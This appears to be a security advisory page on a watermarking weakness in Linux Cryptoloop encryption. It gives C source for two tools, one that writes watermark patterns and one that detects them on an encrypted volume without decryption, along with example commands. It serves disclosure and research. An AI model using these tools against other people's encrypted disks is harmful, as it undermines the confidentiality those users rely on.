Linux Cryptoloop Watermark ExploitSummary
Cryptoloop "makes it possible to create encrypted file systems within a partition or another file in the file system. These encrypted files can the be moved to a CD, DVD, USB memory stick, etc. Cryptoloop makes use of the loop device. This device is a pseudo-device which serves as a 'loop' through which each call to a the file system has to pass. This way, data can be processed in order to encrypt and decrypt it".
Cryptoloop is vulnerable to watermarking, making it possible to determine presence of watermarked data on the encrypted filesystem.
Credit:
The original article can be found at: http://marc.theaimsgroup.com/?l=linux-kernel&m=107719798631935&w=2
The information has been provided by Markku-Juhani O. Saarinen.
Details
This attack exploits weakness in IV computation and knowledge of how file systems place files on disk. This attack works with file systems that have soft block size of 1024 or greater. At least ext2, ext3, reiserfs and minix have such property. This attack makes it possible to detect presence of specially crafted watermarked files, such as, unreleased Hollywood movies, cruise missile service manuals, and other content that you did not create yourself. Watermarked files contain special bit patterns that can be detected without decryption.
For example, to encode author's first name Jari as watermark, we should use ASCII characters 74 97 114 105. This example uses encodings 10...13.
# mount -t ext2 /dev/fd0 /mnt -o loop=/dev/loop0,encryption=AES128
Password:
# ./create-watermark-encodings 10:74 11:97 12:114 13:105 >/mnt/watermarks
# umount /mnt
And then to detect these watermarks:
# dd if=/dev/fd0 bs=64k | ./detect-watermark-encodings
22+1 records in
22+1 records out
1474560 bytes scanned
watermark encoding 10, count 74
watermark encoding 11, count 97
watermark encoding 12, count 114
watermark encoding 13, count 105
Create watermarks:
/*
* create-watermark-encodings.c
*
* Written by Jari Ruusu, February 10 2004
*
* Copyright 2004 by Jari Ruusu.
* Redistribution of this file is permitted under the GNU GPL
*
* Usage:
* ./create-watermark-encodings encoding:count [encoding:count]... >filename
*
* Where encoding is a value in range 1...32 and count is number of
* encodings to write. Watermark encoded file contents are written to
* standard output. Each encoding takes up 1024 bytes of disk space.
*
* Example:
* ./create-watermark-encodings 5:123 19:17 23:2 >/home/foo/watermarks
*
* Credits: Markku-Juhani O. Saarinen discovered this exploit.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
unsigned char buf[1024];
char *progName;
void encodeOne(int encoding)
{
memset(buf, 0, sizeof(buf));
buf[512] = 1;
if(encoding < 1) encoding = 1;
if(encoding < 32) {
buf[512 + (encoding * 16)] = 1;
}
}
void writeOne(void)
{
if(fwrite(buf, 1024, 1, stdout) != 1) {
perror("write failed");
exit(1);
}
}
int main(int argc, char **argv)
{
int encoding, y = 0;
unsigned long count, x;
progName = *argv;
if(argc < 2) {
usage:
fprintf(stderr, "usage: %s encoding:count [encoding:count]... >filename\n", progName);
exit(1);
}
while(--argc > 0) {
if(sscanf(*++argv, "%d:%lu", &encoding, &count) != 2) {
goto usage;
}
for(x = 0; x < count; x++) {
encodeOne(encoding);
writeOne();
y++;
}
}
/* make file size multiple of 4K (to avoid fs tail packing) */
while(y & 3) {
memset(buf, 0, sizeof(buf));
writeOne();
y++;
}
if(fflush(stdout)) {
perror("write failed");
exit(1);
}
exit(0);
}
Detect watermarks:
/*
* detect-watermark-encodings.c
*
* Written by Jari Ruusu, February 10 2004
*
* Copyright 2004 by Jari Ruusu.
* Redistribution of this file is permitted under the GNU GPL
*
* Usage:
* dd if=/dev/hda999 bs=64k | ./detect-watermark-encodings
*
* Program reads encrypted data from standard input and writes human
* readable summary of detected watermark encodings to standard output.
*
* Credits: Markku-Juhani O. Saarinen discovered this exploit.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
unsigned long found[32];
unsigned char buf[1024];
unsigned long long bytes = 0;
int main(int argc, char **argv)
{
int x, y;
memset(found, 0, sizeof(found));
do {
if(fread(buf, 1024, 1, stdin) != 1) break;
bytes += 1024;
y = 0;
do {
/* no encoding if ciphertexts do not match */
if(memcmp(&buf[y] , &buf[y + 512], 16)) break;
/* if ciphertext is same repeated byte, assume */
/* that block was newer written with ciphertext */
for(x = 1; x < 16; x++) {
if(buf[y + x] != buf[y]) break;
}
if(x == 16) break;
/* found watermark encoding */
y += 16;
} while(y < 512);
if(y) {
found[(y >> 4) - 1] += 1;
}
} while(1);
printf("%llu bytes scanned\n", bytes);
y = 1;
for(x = 0; x < 32; x++) {
if(found[x]) {
printf("watermark encoding %d, count %lu\n", x + 1, found[x]);
y = 0;
}
}
if(y) {
printf("no watermark encodings found\n");
}
exit(0);
}
推荐
评论(0条)
